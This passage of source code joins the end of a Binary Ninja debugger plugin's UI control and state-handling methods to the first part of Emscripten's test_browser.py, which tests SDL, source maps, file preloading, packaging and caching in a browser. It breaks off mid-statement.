def perform_step_over_il_after(reason, data):
self.handle_stop_return(reason, data)
self.debug_state.ui.on_step()
self.state_busy("STEPPING")
threading.Thread(target=perform_step_over_il_thread).start()
def perform_step_return(self):
def perform_step_return_thread():
(reason, data) = self.debug_state.step_return()
execute_on_main_thread_and_wait(lambda: perform_step_return_after(reason, data))
def perform_step_return_after(reason, data):
self.handle_stop_return(reason, data)
self.debug_state.ui.on_step()
self.state_busy("STEPPING")
threading.Thread(target=perform_step_return_thread).start()
# -------------------------------------------------------------------------
# Control state setters
# -------------------------------------------------------------------------
def set_actions_enabled(self, **kwargs):
def enable_step_into(e):
self.actionStepIntoAsm.setEnabled(e)
self.actionStepIntoIL.setEnabled(e)
def enable_step_over(e):
self.actionStepOverAsm.setEnabled(e)
self.actionStepOverIL.setEnabled(e)
def enable_starting(e):
self.actionRun.setEnabled(e and self.can_exec())
self.actionAttach.setEnabled(e and self.can_connect())
def enable_stopping(e):
self.actionRestart.setEnabled(e)
self.actionQuit.setEnabled(e)
self.actionDetach.setEnabled(e)
def enable_stepping(e):
self.actionStepIntoAsm.setEnabled(e)
self.actionStepIntoIL.setEnabled(e)
self.actionStepOverAsm.setEnabled(e)
self.actionStepOverIL.setEnabled(e)
self.actionStepReturn.setEnabled(e)
actions = {
"Run": lambda e: self.actionRun.setEnabled(e),
"Restart": lambda e: self.actionRestart.setEnabled(e),
"Quit": lambda e: self.actionQuit.setEnabled(e),
"Attach": lambda e: self.actionAttach.setEnabled(e),
"Detach": lambda e: self.actionDetach.setEnabled(e),
"Pause": lambda e: self.actionPause.setEnabled(e),
"Resume": lambda e: self.actionResume.setEnabled(e),
"StepInto": enable_step_into,
"StepOver": enable_step_over,
"StepReturn": lambda e: self.actionStepReturn.setEnabled(e),
"Threads": lambda e: self.btnThreads.setEnabled(e),
"Starting": enable_starting,
"Stopping": enable_stopping,
"Stepping": enable_stepping,
}
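# e.g. set_actions_enabled(Run=True, Stepping=False) enables the Run action and
# disables all five step actions; actions not named keep their current state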
for (action, enabled) in kwargs.items():
actions[action](enabled)
def set_default_process_action(self, action):
actions = {
"Run": self.actionRun,
"Restart": self.actionRestart,
"Quit": self.actionQuit,
"Attach": self.actionAttach,
"Detach": self.actionDetach,
}
self.btnControl.setDefaultAction(actions[action])
def set_resume_pause_action(self, action):
lookup = {'Resume':self.actionResume, 'Pause':self.actionPause}
self.btnPauseResume.setDefaultAction(lookup[action])
def set_thread_list(self, threads):
def select_thread_fn(tid):
def select_thread(tid):
stateObj = binjaplug.get_state(self.bv)
if stateObj.connected and not stateObj.running:
stateObj.threads.current = tid
stateObj.ui.context_display()
stateObj.ui.on_step()
else:
print('cannot set thread in current state')
return lambda: select_thread(tid)
self.threadMenu.clear()
if len(threads) > 0:
for thread in threads:
item_name = "Thread {} at {}".format(thread['tid'], hex(thread['ip']))
action = self.threadMenu.addAction(item_name, select_thread_fn(thread['tid']))
if thread['selected']:
self.btnThreads.setDefaultAction(action)
else:
defaultThreadAction = self.threadMenu.addAction("Thread List")
defaultThreadAction.setEnabled(False)
self.btnThreads.setDefaultAction(defaultThreadAction)
# -------------------------------------------------------------------------
# State handling
# -------------------------------------------------------------------------
def state_starting(self, msg=None):
self.editStatus.setText(msg or 'INACTIVE')
self.set_actions_enabled(Starting=False, Stopping=False, Stepping=False, Pause=False, Resume=False, Threads=False)
self.set_default_process_action("Attach" if self.can_connect() else "Run")
self.set_thread_list([])
self.set_resume_pause_action("Pause")
def state_inactive(self, msg=None):
self.editStatus.setText(msg or 'INACTIVE')
self.set_actions_enabled(Starting=True, Stopping=False, Stepping=False, Pause=False, Resume=False, Threads=False)
self.set_default_process_action("Attach" if self.can_connect() else "Run")
self.set_thread_list([])
self.set_resume_pause_action("Pause")
def state_stopped(self, msg=None):
self.editStatus.setText(msg or 'STOPPED')
self.set_actions_enabled(Starting=False, Stopping=True, Stepping=True, Pause=True, Resume=True, Threads=True)
self.set_default_process_action("Quit")
self.set_resume_pause_action("Resume")
def state_stopped_extern(self, msg=None):
self.editStatus.setText(msg or 'STOPPED')
self.set_actions_enabled(Starting=False, Stopping=True, Stepping=True, StepReturn=False, Pause=True, Resume=True, Threads=True)
self.set_default_process_action("Quit")
self.set_resume_pause_action("Resume")
def state_running(self, msg=None):
self.editStatus.setText(msg or 'RUNNING')
self.set_actions_enabled(Starting=False, Stopping=True, Stepping=False, Pause=True, Resume=False, Threads=False)
self.set_default_process_action("Quit")
self.set_resume_pause_action("Pause")
def state_busy(self, msg=None):
self.editStatus.setText(msg or 'RUNNING')
self.set_actions_enabled(Starting=False, Stopping=True, Stepping=False, Pause=True, Resume=False, Threads=False)
self.set_default_process_action("Quit")
self.set_resume_pause_action("Pause")
def state_error(self, msg=None):
self.editStatus.setText(msg or 'ERROR')
if self.debug_state.connected:
self.set_actions_enabled(Starting=False, Stopping=True, Pause=False, Resume=False, Stepping=False, Threads=False)
self.set_default_process_action("Detach" if self.can_connect() else "Quit")
else:
self.set_actions_enabled(Starting=True, Stopping=False, Pause=False, Resume=False, Stepping=False, Threads=False)
self.set_default_process_action("Attach" if self.can_connect() else "Run")
self.set_thread_list([])
self.set_resume_pause_action("Resume")
def handle_stop_return(self, reason, data):
if reason == DebugAdapter.STOP_REASON.STDOUT_MESSAGE:
self.state_stopped('stdout: '+data)
elif reason == DebugAdapter.STOP_REASON.PROCESS_EXITED:
self.debug_state.quit()
self.state_inactive('process exited, return code=%d' % data)
elif reason == DebugAdapter.STOP_REASON.BACKEND_DISCONNECTED:
self.debug_state.quit()
self.state_inactive('backend disconnected (process exited?)')
|
test_browser.py
|
# coding=utf-8
from __future__ import print_function
import multiprocessing, os, shutil, subprocess, unittest, zlib, webbrowser, time, shlex
from runner import BrowserCore, path_from_root, has_browser, get_browser
from tools.shared import *
try:
from http.server import BaseHTTPRequestHandler, HTTPServer
except ImportError:
# Python 2 compatibility
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
def test_chunked_synchronous_xhr_server(support_byte_ranges, chunkSize, data, checksum, port):
class ChunkedServerHandler(BaseHTTPRequestHandler):
def sendheaders(s, extra=[], length=len(data)):
s.send_response(200)
s.send_header("Content-Length", str(length))
s.send_header("Access-Control-Allow-Origin", "http://localhost:%s" % port)
s.send_header("Access-Control-Expose-Headers", "Content-Length, Accept-Ranges")
s.send_header("Content-type", "application/octet-stream")
if support_byte_ranges:
s.send_header("Accept-Ranges", "bytes")
for i in extra:
s.send_header(i[0], i[1])
s.end_headers()
def do_HEAD(s):
s.sendheaders()
def do_OPTIONS(s):
s.sendheaders([("Access-Control-Allow-Headers", "Range")], 0)
def do_GET(s):
if not support_byte_ranges:
s.sendheaders()
s.wfile.write(data)
else:
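# serve only the requested byte range, e.g. "Range: bytes=0-1023" parses to
# start=0, end=min(1023, len(data)-1) and a Content-Length of end-start+1 bytes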
(start, end) = s.headers.get("range").split("=")[1].split("-")
start = int(start)
end = int(end)
end = min(len(data)-1, end)
length = end-start+1
s.sendheaders([],length)
s.wfile.write(data[start:end+1])
# CORS preflight makes OPTIONS requests which we need to account for.
expectedConns = 22
httpd = HTTPServer(('localhost', 11111), ChunkedServerHandler)
for i in range(expectedConns+1):
httpd.handle_request()
def shell_with_script(shell_file, output_file, replacement):
with open(path_from_root('src', shell_file)) as input:
with open(output_file, 'w') as output:
output.write(input.read().replace('{{{ SCRIPT }}}', replacement))
requires_hardware = unittest.skipIf(os.environ.get("EM_LACKS_HARDWARE_ACCESS"), "This test requires hardware access including graphics and sound devices")
class browser(BrowserCore):
@classmethod
def setUpClass(self):
super(browser, self).setUpClass()
self.browser_timeout = 20
print()
print('Running the browser tests. Make sure the browser allows popups from localhost.')
print()
def test_sdl1_in_emscripten_nonstrict_mode(self):
if 'EMCC_STRICT' in os.environ and int(os.environ['EMCC_STRICT']): self.skipTest('This test requires being run in non-strict mode (EMCC_STRICT env. variable unset)')
# TODO: This test is verifying behavior that will be deprecated at some point in the future, remove this test once
# system JS libraries are no longer automatically linked to anymore.
self.btest('hello_world_sdl.cpp', reference='htmltest.png')
def test_sdl1(self):
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-lSDL', '-lGL'])
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-s', 'USE_SDL=1', '-lGL']) # is the default anyhow
# Deliberately named as test_zzz_* to make this test the last one
# as this test may take the focus away from the main test window
# by opening a new window and possibly not closing it.
def test_zzz_html_source_map(self):
if not has_browser(): self.skipTest('need a browser')
cpp_file = os.path.join(self.get_dir(), 'src.cpp')
html_file = os.path.join(self.get_dir(), 'src.html')
# browsers will try to 'guess' the corresponding original line if a
# generated line is unmapped, so if we want to make sure that our
# numbering is correct, we need to provide a couple of 'possible wrong
# answers'. thus, we add some printf calls so that the cpp file gets
# multiple mapped lines. in other words, if the program consists of a
# single 'throw' statement, browsers may just map any thrown exception to
# that line, because it will be the only mapped line.
with open(cpp_file, 'w') as f:
f.write(r'''
#include <cstdio>
int main() {
printf("Starting test\n");
try {
throw 42; // line 8
} catch (int e) { }
printf("done\n");
return 0;
}
''')
# use relative paths when calling emcc, because file:// URIs can only load
# sourceContent when the maps are relative paths
try_delete(html_file)
try_delete(html_file + '.map')
Popen([PYTHON, EMCC, 'src.cpp', '-o', 'src.html', '-g4', '-s', 'WASM=0'],
cwd=self.get_dir()).communicate()
assert os.path.exists(html_file)
assert os.path.exists(html_file + '.map')
webbrowser.open_new('file://' + html_file)
print('''
If manually bisecting:
Check that you see src.cpp among the page sources.
Even better, add a breakpoint, e.g. on the printf, then reload, then step through and see the print (best to run with EM_SAVE_DIR=1 for the reload).
''')
def test_emscripten_log(self):
# TODO: wasm support for source maps
src = os.path.join(self.get_dir(), 'src.cpp')
open(src, 'w').write(self.with_report_result(open(path_from_root('tests', 'emscripten_log', 'emscripten_log.cpp')).read()))
Popen([PYTHON, EMCC, src, '--pre-js', path_from_root('src', 'emscripten-source-map.min.js'), '-g', '-o', 'page.html', '-s', 'DEMANGLE_SUPPORT=1', '-s', 'WASM=0']).communicate()
self.run_browser('page.html', None, '/report_result?1')
def build_native_lzma(self):
lzma_native = path_from_root('third_party', 'lzma.js', 'lzma-native')
if os.path.isfile(lzma_native) and os.access(lzma_native, os.X_OK): return
cwd = os.getcwd()
try:
os.chdir(path_from_root('third_party', 'lzma.js'))
if WINDOWS and Building.which('mingw32-make'): # On Windows prefer using MinGW make if it exists, otherwise fall back to hoping we have cygwin make.
Popen(['doit.bat']).communicate()
else:
Popen(['sh', './doit.sh']).communicate()
finally:
os.chdir(cwd)
def test_preload_file(self):
absolute_src_path = os.path.join(self.get_dir(), 'somefile.txt').replace('\\', '/')
open(absolute_src_path, 'w').write('''load me right before running the code please''')
absolute_src_path2 = os.path.join(self.get_dir(), '.somefile.txt').replace('\\', '/')
open(absolute_src_path2, 'w').write('''load me right before running the code please''')
absolute_src_path3 = os.path.join(self.get_dir(), 'some@file.txt').replace('\\', '/')
open(absolute_src_path3, 'w').write('''load me right before running the code please''')
def make_main(path):
print('make main at', path)
path = path.replace('\\', '\\\\').replace('"', '\\"') # Escape tricky path name for use inside a C string.
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("load me right before", buf);
REPORT_RESULT(result);
return 0;
}
''' % path))
test_cases = [
# (source preload-file string, file on target FS to load)
("somefile.txt", "somefile.txt"),
(".somefile.txt@somefile.txt", "somefile.txt"),
("./somefile.txt", "somefile.txt"),
("somefile.txt@file.txt", "file.txt"),
("./somefile.txt@file.txt", "file.txt"),
("./somefile.txt@./file.txt", "file.txt"),
("somefile.txt@/file.txt", "file.txt"),
("somefile.txt@/", "somefile.txt"),
(absolute_src_path + "@file.txt", "file.txt"),
(absolute_src_path + "@/file.txt", "file.txt"),
(absolute_src_path + "@/", "somefile.txt"),
("somefile.txt@/directory/file.txt", "/directory/file.txt"),
("somefile.txt@/directory/file.txt", "directory/file.txt"),
(absolute_src_path + "@/directory/file.txt", "directory/file.txt"),
("some@@file.txt@other.txt", "other.txt"),
("some@@file.txt@some@@otherfile.txt", "some@otherfile.txt")]
for test in test_cases:
(srcpath, dstpath) = test
print('Testing', srcpath, dstpath)
make_main(dstpath)
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', srcpath, '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Test that '--no-heap-copy' works.
if WINDOWS:
# On Windows, the following non-alphanumeric non-control code ASCII characters are supported.
# The characters <, >, ", |, ?, * are not allowed, because the Windows filesystem doesn't support those.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~.txt'
else:
# All 7-bit non-alphanumeric non-control code ASCII characters except /, : and \ are allowed.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~ "*<>?|.txt'
open(os.path.join(self.get_dir(), tricky_filename), 'w').write('''load me right before running the code please''')
make_main(tricky_filename)
# As an Emscripten-specific feature, the character '@' must be escaped in the form '@@' to not confuse with the 'src@dst' notation.
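# (see the mapping table above: "some@@file.txt@other.txt" packages the local
# file "some@file.txt" as "other.txt" on the virtual filesystem)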
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', tricky_filename.replace('@', '@@'), '--no-heap-copy', '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# By absolute path
make_main('somefile.txt') # absolute becomes relative
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', absolute_src_path, '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Test subdirectory handling with asset packaging.
try_delete(self.in_dir('assets'))
os.makedirs(os.path.join(self.get_dir(), 'assets/sub/asset1/').replace('\\', '/'))
os.makedirs(os.path.join(self.get_dir(), 'assets/sub/asset1/.git').replace('\\', '/')) # Test adding directory that shouldn't exist.
os.makedirs(os.path.join(self.get_dir(), 'assets/sub/asset2/').replace('\\', '/'))
open(os.path.join(self.get_dir(), 'assets/sub/asset1/file1.txt'), 'w').write('''load me right before running the code please''')
open(os.path.join(self.get_dir(), 'assets/sub/asset1/.git/shouldnt_be_embedded.txt'), 'w').write('''this file should not get embedded''')
open(os.path.join(self.get_dir(), 'assets/sub/asset2/file2.txt'), 'w').write('''load me right before running the code please''')
absolute_assets_src_path = os.path.join(self.get_dir(), 'assets').replace('\\', '/')
def make_main_two_files(path1, path2, nonexistingpath):
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("load me right before", buf);
f = fopen("%s", "r");
if (f == NULL)
result = 0;
fclose(f);
f = fopen("%s", "r");
if (f != NULL)
result = 0;
REPORT_RESULT(result);
return 0;
}
''' % (path1, path2, nonexistingpath)))
test_cases = [
# (source directory to embed, file1 on target FS to load, file2 on target FS to load, name of a file that *shouldn't* exist on VFS)
("assets", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@./", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/assets", "/assets/sub/asset1/file1.txt", "/assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt")]
for test in test_cases:
(srcpath, dstpath1, dstpath2, nonexistingpath) = test
make_main_two_files(dstpath1, dstpath2, nonexistingpath)
print(srcpath)
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', srcpath, '--exclude-file', '*/.*', '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Should still work with -o subdir/..
make_main('somefile.txt') # absolute becomes relative
try:
os.mkdir(os.path.join(self.get_dir(), 'dirrey'))
except:
pass
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', absolute_src_path, '-o', 'dirrey/page.html']).communicate()
self.run_browser('dirrey/page.html', 'You should see |load me right before|.', '/report_result?1')
# With FS.preloadFile
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.preRun = function() {
FS.createPreloadedFile('/', 'someotherfile.txt', 'somefile.txt', true, false); // we need --use-preload-plugins for this.
};
''')
make_main('someotherfile.txt')
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--pre-js', 'pre.js', '-o', 'page.html', '--use-preload-plugins']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Tests that user .html shell files can manually download .data files created with --preload-file cmdline.
def test_preload_file_with_manual_data_download(self):
src = os.path.join(self.get_dir(), 'src.cpp')
open(src, 'w').write(self.with_report_result(open(os.path.join(path_from_root('tests/manual_download_data.cpp'))).read()))
data = os.path.join(self.get_dir(), 'file.txt')
open(data, 'w').write('''Hello!''')
Popen([PYTHON, EMCC, 'src.cpp', '-o', 'manual_download_data.js', '--preload-file', data + '@/file.txt']).communicate()
shutil.copyfile(path_from_root('tests', 'manual_download_data.html'), os.path.join(self.get_dir(), 'manual_download_data.html'))
self.run_browser('manual_download_data.html', 'Hello!', '/report_result?1')
# Tests that if the output files have single or double quotes in them, that it will be handled by correctly escaping the names.
def test_output_file_escaping(self):
tricky_part = '\'' if WINDOWS else '\' and \"' # On Windows, files/directories may not contain a double quote character. On non-Windowses they can, so test that.
d = 'dir with ' + tricky_part
abs_d = os.path.join(self.get_dir(), d)
try:
os.mkdir(abs_d)
except:
pass
txt = 'file with ' + tricky_part + '.txt'
abs_txt = os.path.join(abs_d, txt)
open(abs_txt, 'w').write('load me right before')
cpp = os.path.join(d, 'file with ' + tricky_part + '.cpp')
open(cpp, 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("|load me right before|", buf);
REPORT_RESULT(result);
return 0;
}
''' % (txt.replace('\'', '\\\'').replace('\"', '\\"'))))
data_file = os.path.join(abs_d, 'file with ' + tricky_part + '.data')
data_js_file = os.path.join(abs_d, 'file with ' + tricky_part + '.js')
Popen([PYTHON, FILE_PACKAGER, data_file, '--use-preload-cache', '--indexedDB-name=testdb', '--preload', abs_txt + '@' + txt, '--js-output=' + data_js_file]).communicate()
page_file = os.path.join(d, 'file with ' + tricky_part + '.html')
abs_page_file = os.path.join(self.get_dir(), page_file)
Popen([PYTHON, EMCC, cpp, '--pre-js', data_js_file, '-o', abs_page_file, '-s', 'FORCE_FILESYSTEM=1']).communicate()
self.run_browser(page_file, '|load me right before|.', '/report_result?0')
def test_preload_caching(self):
open(os.path.join(self.get_dir(), 'somefile.txt'), 'w').write('''load me right before running the code please''')
def make_main(path):
print(path)
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern "C" {
extern int checkPreloadResults();
}
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
result += !strcmp("load me right before", buf);
result += checkPreloadResults();
REPORT_RESULT(result);
return 0;
}
''' % path))
open(os.path.join(self.get_dir(), 'test.js'), 'w').write('''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
make_main('somefile.txt')
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--use-preload-cache', '--js-library', os.path.join(self.get_dir(), 'test.js'), '--preload-file', 'somefile.txt', '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?2')
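# Same idea as test_preload_caching, but the data is packaged explicitly with file_packager.py using
# --use-preload-cache and a custom --indexedDB-name, then pulled in via --pre-js with FORCE_FILESYSTEM.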
def test_preload_caching_indexeddb_name(self):
open(os.path.join(self.get_dir(), 'somefile.txt'), 'w').write('''load me right before running the code please''')
def make_main(path):
print(path)
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern "C" {
extern int checkPreloadResults();
}
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
result += !strcmp("load me right before", buf);
result += checkPreloadResults();
REPORT_RESULT(result);
return 0;
}
''' % path))
open(os.path.join(self.get_dir(), 'test.js'), 'w').write('''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
make_main('somefile.txt')
Popen([PYTHON, FILE_PACKAGER, os.path.join(self.get_dir(), 'somefile.data'), '--use-preload-cache', '--indexedDB-name=testdb', '--preload', os.path.join(self.get_dir(), 'somefile.txt'), '--js-output=' + os.path.join(self.get_dir(), 'somefile.js')]).communicate()
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--js-library', os.path.join(self.get_dir(), 'test.js'), '--pre-js', 'somefile.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM=1']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?2')
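# Preloads two files in nested directories, first file-by-file and then by preloading the whole directory
# (removing the on-disk files afterwards to prove the packaged copies are used).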
def test_multifile(self):
# a few files inside a directory
self.clear()
os.makedirs(os.path.join(self.get_dir(), 'subdirr'))
os.makedirs(os.path.join(self.get_dir(), 'subdirr', 'moar'))
open(os.path.join(self.get_dir(), 'subdirr', 'data1.txt'), 'w').write('''1214141516171819''')
open(os.path.join(self.get_dir(), 'subdirr', 'moar', 'data2.txt'), 'w').write('''3.14159265358979''')
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
int result = !strcmp("1214141516171819", buf);
FILE *f2 = fopen("subdirr/moar/data2.txt", "r");
fread(buf, 1, 16, f2);
buf[16] = 0;
fclose(f2);
printf("|%s|\n", buf);
result = result && !strcmp("3.14159265358979", buf);
REPORT_RESULT(result);
return 0;
}
'''))
# by individual files
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', 'subdirr/data1.txt', '--preload-file', 'subdirr/moar/data2.txt', '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
os.remove('page.html')
# by directory, and remove files to make sure
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', 'subdirr', '-o', 'page.html']).communicate()
shutil.rmtree(os.path.join(self.get_dir(), 'subdirr'))
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
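# The .data package is moved into a cdn/ subdirectory and Module.filePackagePrefixURL is set in the shell,
# so the loader must fetch the package from that prefix.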
def test_custom_file_package_url(self):
# a few files inside a directory
self.clear()
os.makedirs(os.path.join(self.get_dir(), 'subdirr'))
os.makedirs(os.path.join(self.get_dir(), 'cdn'))
open(os.path.join(self.get_dir(), 'subdirr', 'data1.txt'), 'w').write('''1214141516171819''')
# change the file package base dir to look in a "cdn". note that normally you would add this in your own custom html file etc., and not by
# modifying the existing shell in this manner
open(self.in_dir('shell.html'), 'w').write(open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { filePackagePrefixURL: "cdn/", '))
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
int result = !strcmp("1214141516171819", buf);
REPORT_RESULT(result);
return 0;
}
'''))
def test():
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--shell-file', 'shell.html', '--preload-file', 'subdirr/data1.txt', '-o', 'test.html']).communicate()
shutil.move('test.data', os.path.join('cdn', 'test.data'))
self.run_browser('test.html', '', '/report_result?1')
test()
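# Verifies that a missing or unreachable .data package surfaces as a window.onerror whose message names the
# package: the custom shell reports 1 when 'test.data' appears in the error text.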
def test_missing_data_throws_error(self):
def setup(assetLocalization):
self.clear()
open(self.in_dir("data.txt"), "w").write('''data''');
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
// This code should never be executed, because the required dependency file is missing.
REPORT_RESULT(0);
return 0;
}
'''))
open(os.path.join(self.get_dir(), 'on_window_error_shell.html'), 'w').write(r'''
<html>
<center><canvas id='canvas' width='256' height='256'></canvas></center>
<hr><div id='output'></div><hr>
<script type='text/javascript'>
window.onerror = function(error) {
window.onerror = null;
var result = error.indexOf("test.data") >= 0 ? 1 : 0;
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:8888/report_result?' + result, true);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}
var Module = {
filePackagePrefixURL: "''' + assetLocalization + r'''",
print: (function() {
var element = document.getElementById('output');
return function(text) { element.innerHTML += text.replace('\n', '<br>', 'g') + '<br>';};
})(),
canvas: document.getElementById('canvas')
};
</script>
{{{ SCRIPT }}}
</body>
</html>'''
)
def test():
# test that a missing file causes xhr.onload to run with a status other than 200, 304 or 206
setup("")
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html']).communicate()
shutil.move('test.data', 'missing.data')
self.run_browser('test.html', '', '/report_result?1')
# test that an unknown protocol goes through xhr.onerror
setup("unknown_protocol://")
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html']).communicate()
self.run_browser('test.html', '', '/report_result?1')
# test wrong protocol and port
setup("https://localhost:8800/");
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html']).communicate()
self.run_browser('test.html', '', '/report_result?1')
test()
# TODO: CORS, test using a full url for filePackagePrefixURL
#open(self.in_dir('shell.html'), 'w').write(open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { filePackagePrefixURL: "http://localhost:8888/cdn/", '))
#test()
def test_sdl_swsurface(self):
self.btest('sdl_swsurface.c', args=['-lSDL', '-lGL'], expected='1')
def test_sdl_surface_lock_opts(self):
# Test Emscripten-specific extensions to optimize SDL_LockSurface and SDL_UnlockSurface.
self.btest('hello_world_sdl.cpp', reference='htmltest.png', message='You should see "hello, world!" and a colored cube.', args=['-DTEST_SDL_LOCK_OPTS', '-lSDL', '-lGL'])
def test_sdl_image(self):
# load an image file and get pixel data. Also covers -O2 with --preload-file and --memory-init-file
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.jpg'))
open(os.path.join(self.get_dir(), 'sdl_image.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_image.c')).read()))
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
Popen([
PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_image.c'), '-o', 'page.html', '-O2', '-lSDL', '-lGL', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '--use-preload-plugins'
]).communicate()
self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_jpeg(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.jpeg'))
open(os.path.join(self.get_dir(), 'sdl_image_jpeg.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_image.c')).read()))
Popen([
